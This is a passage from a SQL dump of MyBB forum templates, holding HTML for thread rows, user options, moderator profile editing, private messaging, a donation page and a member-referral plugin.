class=\"{$bgcolor}{$thread_type_class}\">\n {$attachment_count}\n <div>\n <span>{$prefix} {$gotounread}{$thread[\'threadprefix\']}<a href=\"{$thread[\'threadlink\']}\" class=\"{$inline_edit_class} {$new_class}\" id=\"tid_{$inline_edit_tid}\">{$thread[\'subject\']}</a>{$thread[\'multipage\']}</span>\n <div class=\"author smalltext\">{$thread[\'profilelink\']}</div>{$thread[\'hellban_message\']}\n </div>\n </td>\n <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a>{$unapproved_posts}</td>\n <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\">{$thread[\'views\']}</td>\n {$rating}\n <td class=\"{$bgcolor}{$thread_type_class}\" style=\"white-space: nowrap; text-align: right;\">\n <span class=\"lastpost smalltext\">{$lastpostdate} {$lastposttime}<br />\n <a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span>\n </td>\n{$modbit}\n</tr>\n', '1', '1608', '', '1339904257'); INSERT INTO mybb_templates VALUES('1887', 'usercp_options', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->edit_options}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$errors}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_options}</strong></td>\n</tr>\n<tr>\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->login_cookies_privacy}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"invisible\" id=\"invisible\" value=\"1\" {$invisiblecheck} /></td>\n<td><span class=\"smalltext\"><label for=\"invisible\">{$lang->invisible_mode}</label></span></td>\n</tr>\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->messaging_notification}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"allownotices\" id=\"allownotices\" value=\"1\" {$allownoticescheck} /></td>\n<td><span class=\"smalltext\"><label for=\"allownotices\">{$lang->allow_notices}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"hideemail\" id=\"hideemail\" value=\"1\" {$hideemailcheck} /></td>\n<td><span class=\"smalltext\"><label for=\"hideemail\">{$lang->allow_emails}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivepms\" id=\"receivepms\" value=\"1\" {$receivepmscheck} /></td>\n<td><span class=\"smalltext\"><label for=\"receivepms\">{$lang->receive_pms}</label></span></td>\n</tr>\n{$privatewarning}\n{$pms_from_buddys}\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotice\" id=\"pmnotice\" value=\"1\"{$pmnoticecheck} /></td>\n<td><span class=\"smalltext\"><label for=\"pmnotice\">{$lang->pm_notice}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotify\" id=\"pmnotify\" value=\"1\" {$pmnotifycheck} /></td>\n<td><span class=\"smalltext\"><label for=\"pmnotify\">{$lang->pm_notify}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\"><label for=\"subscriptionmethod\">{$lang->subscription_method}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\">\n <select name=\"subscriptionmethod\" id=\"subscriptionmethod\">\n <option value=\"0\" {$no_subscribe_selected}>{$lang->no_auto_subscribe}</option>\n <option value=\"1\" {$no_email_subscribe_selected}>{$lang->no_email_subscribe}</option>\n <option value=\"2\" {$instant_email_subscribe_selected}>{$lang->instant_email_subscribe}</option>\n </select>\n</td>\n</tr>\n\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->date_time_options}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n<tr>\n<td><span class=\"smalltext\">{$lang->date_format}</span></td>\n</tr>\n<tr>\n<td>\n<select name=\"dateformat\">\n{$date_format_options}\n</select>\n</td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->time_format}</span></td>\n</tr>\n<tr>\n<td>\n<select name=\"timeformat\">\n{$time_format_options}\n</select>\n</td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->time_offset_desc}</span></td>\n</tr>\n<tr>\n<td>{$tzselect}</td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->dst_correction}</span></td>\n</tr>\n<tr>\n<td>\n <select name=\"dstcorrection\">\n <option value=\"2\" {$dst_auto_selected}>{$lang->dst_correction_auto}</option>\n <option value=\"1\" {$dst_enabled_selected}>{$lang->dst_correction_enabled}</option>\n <option value=\"0\" {$dst_disabled_selected}>{$lang->dst_correction_disabled}</option>\n </select>\n</td>\n</tr>\n</table>\n</fieldset>\n</td>\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->forum_display_options}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n{$tppselect}\n<tr>\n<td><span class=\"smalltext\">{$lang->thread_view}</span></td>\n</tr>\n<tr>\n<td>\n<select name=\"daysprune\">\n<option value=\"\">{$lang->use_default}</option>\n<option value=\"1\" {$daysprunesel[\'1\']}>{$lang->thread_view_lastday}</option>\n<option value=\"5\" {$daysprunesel[\'5\']}>{$lang->thread_view_5days}</option>\n<option value=\"10\" {$daysprunesel[\'10\']}>{$lang->thread_view_10days}</option>\n<option value=\"20\" {$daysprunesel[\'20\']}>{$lang->thread_view_20days}</option>\n<option value=\"50\" {$daysprunesel[\'50\']}>{$lang->thread_view_50days}</option>\n<option value=\"75\" {$daysprunesel[\'75\']}>{$lang->thread_view_75days}</option>\n<option value=\"100\" {$daysprunesel[\'100\']}>{$lang->thread_view_100days}</option>\n<option value=\"365\" {$daysprunesel[\'365\']}>{$lang->thread_view_year}</option>\n<option value=\"9999\" {$daysprunesel[\'9999\']}>{$lang->thread_view_all}</option>\n</select>\n</td>\n</tr>\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->thread_view_options}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n <tr>\n <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"classicpostbit\" id=\"classicpostbit\" value=\"1\" {$classicpostbitcheck} /></td>\n <td><span class=\"smalltext\"><label for=\"classicpostbit\">{$lang->show_classic_postbit}</label></span></td>\n </tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showsigs\" id=\"showsigs\" value=\"1\" {$showsigscheck} /></td>\n<td><span class=\"smalltext\"><label for=\"showsigs\">{$lang->show_sigs}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showavatars\" id=\"showavatars\" value=\"1\" {$showavatarscheck} /></td>\n<td><span class=\"smalltext\"><label for=\"showavatars\">{$lang->show_avatars}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showquickreply\" id=\"showquickreply\" value=\"1\" {$showquickreplycheck} /></td>\n<td><span class=\"smalltext\"><label for=\"showquickreply\">{$lang->show_quick_reply}</label></span></td>\n</tr>\n{$pppselect}\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->thread_mode}</span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><select name=\"threadmode\"><option value=\"\">{$lang->use_default}</option><option value=\"linear\" {$threadview[\'linear\']}>{$lang->linear}</option><option value=\"threaded\" {$threadview[\'threaded\']}>{$lang->threaded}</option></select></td>\n</tr>\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->other_options}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showredirect\" id=\"showredirect\" value=\"1\" {$showredirectcheck} /></td>\n<td><span class=\"smalltext\"><label for=\"showredirect\">{$lang->show_redirect}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showcodebuttons\" id=\"showcodebuttons\" value=\"1\" {$showcodebuttonscheck} /></td>\n<td><span class=\"smalltext\"><label for=\"showcodebuttons\">{$lang->show_codebuttons}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->style}</span></td>\n</tr>\n<tr>\n<td colspan=\"2\">{$stylelist}</td>\n</tr>\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->board_language}</span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><select name=\"language\"><option value=\"\">{$lang->use_default}</option><option value=\"0\">-----------</option>{$langoptions}</select></td>\n</tr>\n</table>\n</fieldset>\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_options\" />\n<input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->update_options}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '1', '1608', '', '1339904267'); INSERT INTO mybb_templates VALUES('1889', 'modcp_editprofile', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->edit_profile}</title>\n{$headerinclude}\n<script type=\"text/javascript\">\n<!--\n var mod_posts = \'{$modpost_check}\';\n var susp_posts = \'{$suspost_check}\';\n// -->\n</script>\n</head>\n<body>\n {$header}\n <form action=\"modcp.php\" method=\"post\">\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n {$errors}\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_profile}</strong></td>\n </tr>\n <tr>\n <td width=\"50%\" class=\"trow1\" valign=\"top\">\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->profile_required}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n <tr>\n <td><span class=\"smalltext\">{$lang->current_username}</span></td>\n </tr>\n <tr>\n <td><strong>{$profile_link}</strong></td>\n </tr>\n {$requiredfields}\n </table>\n </fieldset>\n <br />\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->profile_optional}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n <tr>\n <td colspan=\"3\"><span class=\"smalltext\"><label><input type=\"checkbox\" class=\"checkbox\" name=\"remove_avatar\" value=\"1\" /> {$lang->remove_avatar}</label></span></td>\n </tr>\n\n <tr>\n <td colspan=\"3\"><span class=\"smalltext\">{$lang->birthday}</span></td>\n </tr>\n <tr>\n <td>\n <select name=\"birthday_day\">\n <option value=\"\">&nbsp;</option>\n {$bdaydaysel}\n </select>\n </td>\n <td>\n <select name=\"birthday_month\">\n <option value=\"\">&nbsp;</option>\n <option value=\"1\" {$bdaymonthsel[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\" {$bdaymonthsel[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\" {$bdaymonthsel[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\" {$bdaymonthsel[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\" {$bdaymonthsel[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\" {$bdaymonthsel[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\" {$bdaymonthsel[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\" {$bdaymonthsel[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\" {$bdaymonthsel[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\" {$bdaymonthsel[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\" {$bdaymonthsel[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\" {$bdaymonthsel[\'12\']}>{$lang->month_12}</option>\n </select>\n </td>\n <td>\n <input type=\"text\" class=\"textbox\" size=\"4\" maxlength=\"4\" name=\"birthday_year\" value=\"{$mybb->input[\'birthday_year\']}\" />\n </td>\n </tr>\n <tr>\n <td colspan=\"3\"><span class=\"smalltext\">{$lang->website_url}</span></td>\n </tr>\n <tr>\n <td colspan=\"3\"><input type=\"text\" class=\"textbox\" name=\"website\" size=\"25\" maxlength=\"75\" value=\"{$mybb->input[\'website\']}\" /></td>\n </tr>\n </table>\n </fieldset>\n {$privatewarning}\n{$customfields}\n </td>\n <td width=\"50%\" class=\"trow1\" valign=\"top\">\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->custom_usertitle}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n <tr>\n <td><span class=\"smalltext\">{$lang->custom_usertitle_note}</span></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->default_usertitle}</span></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\"><strong>{$defaulttitle}</strong></span></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->current_custom_usertitle}</span></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\"><strong>{$user[\'usertitle\']}</strong></span></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->new_custom_usertitle}</span></td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"usertitle\" size=\"25\" maxlength=\"{$mybb->settings[\'customtitlemaxlength\']}\" value=\"{$newtitle}\" /></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\"><input type=\"checkbox\" name=\"reverttitle\" id=\"reverttitle\" class=\"checkbox\" /> {$lang->revert_usertitle}</span></td>\n </tr>\n </table>\n </fieldset>\n <br />\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->additional_contact_details}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n <tr>\n <td><span class=\"smalltext\">{$lang->icq_number}</span></td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"icq\" size=\"25\" value=\"{$mybb->input[\'icq\']}\" /></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->aim_screenname}</span></td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"aim\" size=\"25\" value=\"{$mybb->input[\'aim\']}\" /></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->msn}</span></td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"msn\" size=\"25\" value=\"{$mybb->input[\'msn\']}\" /></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->yahoo_id}</span></td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"yahoo\" size=\"25\" value=\"{$mybb->input[\'yahoo\']}\" /></td>\n </tr>\n </table>\n </fieldset>\n <br />\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->moderation}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n <tr>\n <td>\n<dl style=\"margin-top: 0; margin-bottom: 0;\">\n<dt><label><input type=\"checkbox\" name=\"moderateposting\" value=\"1\" {$modpost_checked} class=\"checkbox\" onclick=\"toggleSuspend(\'modposts\');\" id=\"modpost\" /> {$lang->moderate_posts}</label></dt>\n<dd style=\"margin-top: 4px;\" id=\"modposts_action\">\n<table cellpadding=\"4\">\n{$moderateposts_info}\n <tr>\n <td width=\"35%\">{$lang->modpost_length}</td>\n <td><input type=\"text\" name=\"modpost_time\" value=\"{$mybb->input[\'modpost_time\']}\" class=\"textbox\" style=\"width: 2em;\" /> {$modpost_options}</td>\n </tr>\n</table>\n</dd>\n</dl>\n </td>\n </tr>\n <tr>\n <td>\n<dl style=\"margin-top: 0; margin-bottom: 0;\">\n<dt><label><input type=\"checkbox\" name=\"suspendposting\" value=\"1\" {$suspost_checked} class=\"checkbox\" onclick=\"toggleSuspend(\'susposts\');\" id=\"suspost\" /> {$lang->suspend_posts}</label></dt>\n<dd style=\"margin-top: 4px;\" id=\"susposts_action\">\n<table cellpadding=\"4\">\n{$suspendposting_info}\n <tr>\n <td width=\"35%\">{$lang->suspost_length}</td>\n <td><input type=\"text\" name=\"suspost_time\" value=\"{$mybb->input[\'suspost_time\']}\" class=\"textbox\" style=\"width: 2em;\" /> {$suspost_options}</td>\n </tr>\n</table>\n</dd>\n</dl></td>\n </tr>\n </table>\n </fieldset>\n </td>\n </tr>\n <tr>\n <td colspan=\"2\" class=\"trow1\" valign=\"top\">\n <fieldset class=\"trow1\">\n <legend><strong>{$lang->signature}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n<tr>\n<td class=\"trow1\" width=\"80%\">\n<textarea rows=\"15\" cols=\"70\" id=\"signature\" name=\"signature\">{$user[\'signature\']}</textarea>\n{$codebuttons}\n</td>\n</tr>\n{$suspend_signature}\n </table>\n </fieldset>\n </td>\n </tr>\n <tr>\n <td colspan=\"2\" class=\"trow1\" valign=\"top\">\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->mod_notes}</strong></legend>\n <textarea name=\"usernotes\" id=\"usernotes\" rows=\"10\" cols=\"70\">{$user[\'usernotes\']}</textarea>\n </fieldset>\n </td>\n </tr>\n </table>\n <br />\n <div align=\"center\">\n <input type=\"hidden\" name=\"action\" value=\"do_editprofile\" />\n <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" />\n <input type=\"submit\" class=\"button\" value=\"{$lang->update_profile}\" />\n </div>\n </td>\n </tr>\n </table>\n </form>\n {$footer}\n<script type=\"text/javascript\">\n<!--\n if(mod_posts == 0)\n {\n $(\'modposts_action\').hide();\n }\n\n if(susp_posts == 0)\n {\n $(\'susposts_action\').hide();\n }\n\n function toggleSuspend(action)\n {\n var item = action + \"_action\";\n\n if(action == \"modposts\")\n {\n $(\'susposts_action\').hide();\n $(\'suspost\').checked = false;\n\n if($(\"modpost\").checked == false)\n {\n $(\"modpost\").checked = false;\n $(\"modposts_action\").hide();\n }\n else\n {\n $(\"modpost\").checked = true;\n $(\"modposts_action\").show();\n }\n }\n\n if(action == \"susposts\")\n {\n $(\'modposts_action\').hide();\n $(\'modpost\').checked = false;\n\n if($(\"suspost\").checked == false)\n {\n $(\"suspost\").checked = false;\n $(\"susposts_action\").hide();\n }\n else\n {\n $(\"suspost\").checked = true;\n $(\"susposts_action\").show();\n }\n }\n }\n// -->\n</script>\n</body>\n</html>', '1', '1608', '', '1339904267'); INSERT INTO mybb_templates VALUES('1891', 'private_send', '<html>\n<head>\n<title>{$lang->compose_pm}</title>\n{$headerinclude}\n<script type=\"text/javascript\" src=\"jscripts/usercp.js?ver=1600\"></script>\n</head>\n<body>\n{$header}\n<form action=\"private.php\" method=\"post\" name=\"input\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$preview}\n{$send_errors}\n{$privatewarning}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->compose_pm}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\" width=\"200\"><strong>{$lang->compose_to}</strong>\n <script type=\"text/javascript\">\n <!--\n document.write(\'(<a href=\"#\" onclick=\"showBcc(); return false;\" title=\"{$lang->compose_bcc_show_title}\">{$lang->compose_bcc_show}<\\/a>)\');\n // -->\n </script>\n <br /><span class=\"smalltext\">{$lang->separate_names}{$buddy_select_to}</span></td>\n<td class=\"trow1\" valign=\"top\"><textarea name=\"to\" id=\"to\" rows=\"2\" cols=\"38\" tabindex=\"1\">{$to}</textarea>{$max_recipients}</td>\n</tr>\n<tr id=\"bcc_area\">\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->compose_bcc}</strong>{$buddy_select_bcc}</td>\n<td class=\"trow2\"><textarea name=\"bcc\" id=\"bcc\" rows=\"2\" cols=\"38\" tabindex=\"1\">{$bcc}</textarea></td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->compose_subject}</strong></td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"3\" /></td>\n</tr>\n{$posticons}\n<tr>\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->compose_message}</strong>{$smilieinserter}</td>\n<td class=\"trow2\">\n<textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"4\">{$message}</textarea>\n{$codebuttons}\n</td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->compose_options}</strong></td>\n<td class=\"trow1\"><span class=\"smalltext\">\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"options[signature]\" value=\"1\" tabindex=\"5\" {$optionschecked[\'signature\']} />{$lang->options_sig}</label><br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"options[disablesmilies]\" value=\"1\" tabindex=\"6\" {$optionschecked[\'disablesmilies\']} />{$lang->options_disable_smilies}</label><br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"options[savecopy]\" value=\"1\" tabindex=\"7\" {$optionschecked[\'savecopy\']} />{$lang->options_save_copy}</label><br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"options[readreceipt]\" value=\"1\" tabindex=\"8\" {$optionschecked[\'readreceipt\']} />{$lang->options_read_receipt}</label><br />\n</span></td>\n</tr>\n</table>\n<br />\n<input type=\"hidden\" name=\"action\" value=\"do_send\" />\n<input type=\"hidden\" name=\"pmid\" value=\"{$pmid}\" />\n<input type=\"hidden\" name=\"do\" value=\"{$do}\" />\n<div style=\"text-align: center;\">\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->send_message}\" tabindex=\"9\" accesskey=\"s\" />\n<input type=\"submit\" class=\"button\" name=\"saveasdraft\" value=\"{$lang->save_draft}\" tabindex=\"10\" />\n<input type=\"submit\" class=\"button\" name=\"preview\" value=\"{$lang->preview}\" tabindex=\"11\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n<script type=\"text/javascript\">\n<!--\n if($(\'bcc_area\') && $(\'bcc\').value == \"\")\n {\n $(\'bcc_area\').style.display = \'none\';\n }\n\n function showBcc()\n {\n if($(\'bcc_area\').style.display == \'none\')\n {\n $(\'bcc_area\').style.display = \'\';\n }\n else\n {\n $(\'bcc_area\').style.display = \'none\';\n }\n }\n// -->\n</script>\n{$autocompletejs}\n</body>\n</html>', '1', '1608', '', '1339904267'); INSERT INTO mybb_templates VALUES('1895', 'donation_page', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$mybb->settings[\'dp_title\']}</title>\r\n{$headerinclude}\r\n{$formcheck}\r\n</head>\r\n<body>\r\n{$header}\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\"><strong>{$mybb->settings[\'dp_title\']}</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"100%\" class=\"trow1\">\r\n{$message}\r\n{$paypalform}\r\n{$credits}\r\n</td>\r\n</tr>\r\n</table>\r\n{$footer}\r\n</body>\r\n</html>', '-1', '', '', '1339907969'); INSERT INTO mybb_templates VALUES('2038', 'refer_drow', '<tr>\n<td class=\"trow2\">{$husername}</td>\n<td class=\"trow1\" align=\"center\">{$date}</td>\n<td class=\"trow2\" align=\"center\">{$activated}</td>\n</tr>', '-1', '1', '', '1346459916'); INSERT INTO mybb_templates VALUES('2039', 'refer_toplist', '<html>\n<head>\n<title>{$mybb->settings[bbname]} - {$lang->refer_toplist}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<div class=\"smalltext\" align=\"center\">[<a href=\"refer.php?action=invite\">{$lang->refer_new}</a>]</div>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[borderwidth]}\" cellpadding=\"{$theme[tablespace]}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->refer_toplist}</strong></td>\n\n</tr>\n<tr>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->referrals}</strong></span></td>\n</tr>\n{$refer_toprow}\n<tr>\n<td align=\"center\" colspan=\"3\" class=\"thead\">\n&nbsp;\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-1', '1', '', '1346459916'); INSERT INTO mybb_templates VALUES('2040', 'refer_toprow', '<tr>\n<td class=\"trow2\">{$rusername}</td>\n<td class=\"trow1\" align=\"center\">{$referraltotals}</td>\n</tr>', '-1', '1', '', '1346459916'); INSERT INTO mybb_templates VALUES('2036', 'refer_profile', '<tr>\n <td class=\"trow1\"><strong>Referrals: </strong></td>\n <td class=\"trow1\">{$easyrefer_count} {$easyrefer_link}</td>\n</tr>', '-1', '1', '', '1346459916'); INSERT INTO mybb_templates VALUES('2037', 'refer_details', '<html>\n<head>\n<title>{$mybb->settings[bbname]} - {$lang->refer_details}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<div class=\"smalltext\" align=\"center\">[<a href=\"refer.php?action=invite\">{$lang->refer_new}</a>] [<a href=\"refer.php?action=toplist\">{$lang->refer_toplink}</a>]</div>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[borderwidth]}\" cellpadding=\"{$theme[tablespace]}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$rusername} {$lang->refer_details}</strong></td>\n\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->joindate}</strong></span></td>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->activated}</strong></span></td>\n\n</tr>\n{$refer_drow}\n<tr>\n<td align=\"center\" colspan=\"3\" class=\"thead\">\n&nbsp;\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-1', '1', '', '1346459916'); INSERT INTO mybb_templates VALUES('1902', 'usercp_nav_misc', '<tr>\n <td class=\"tcat\">\n <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpmisc\']}.gif\" id=\"usercpmisc_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_misc}</strong></span></div>\n </td>\n</tr>\n<tbody style=\"{$collapsed[\'usercpmisc_e\']}\" id=\"usercpmisc_e\">\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=usergroups\" class=\"usercp_nav_item usercp_nav_usergroups\">{$lang->ucp_nav_usergroups}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=editlists\" class=\"usercp_nav_item usercp_nav_editlists\">{$lang->ucp_nav_editlists}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=attachments\" class=\"usercp_nav_item usercp_nav_attachments\">{$lang->ucp_nav_attachments}</a></td></tr>\n <tr><td class=\"trow1 smalltext\">{$draftstart}<a href=\"usercp.php?action=drafts\" class=\"usercp_nav_item usercp_nav_drafts\">{$lang->ucp_nav_drafts} {$draftcount}</a>{$draftend}</td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=subscriptions\" class=\"usercp_nav_item usercp_nav_subscriptions\">{$lang->ucp_nav_subscribed_threads}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=forumsubscriptions\" class=\"usercp_nav_item usercp_nav_fsubscriptions\">{$lang->ucp_nav_forum_subscriptions}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"{$profile_link}\" class=\"usercp_nav_item usercp_nav_viewprofile\">{$lang->ucp_nav_view_profile}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"refer.php?action=invite\">Refer A Member</a></td></tbody>', '1', '1608', '', '1339908022'); INSERT INTO mybb_templates VALUES('2035', 'refer', '<html>\n<head>\n<title>{$mybb->settings[bbname]} - {$lang->title}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$errors}\n<table border=\"0\" cellspacing=\"{$theme[borderwidth]}\" cellpadding=\"{$theme[tablespace]}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$title}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"center\">\n<form 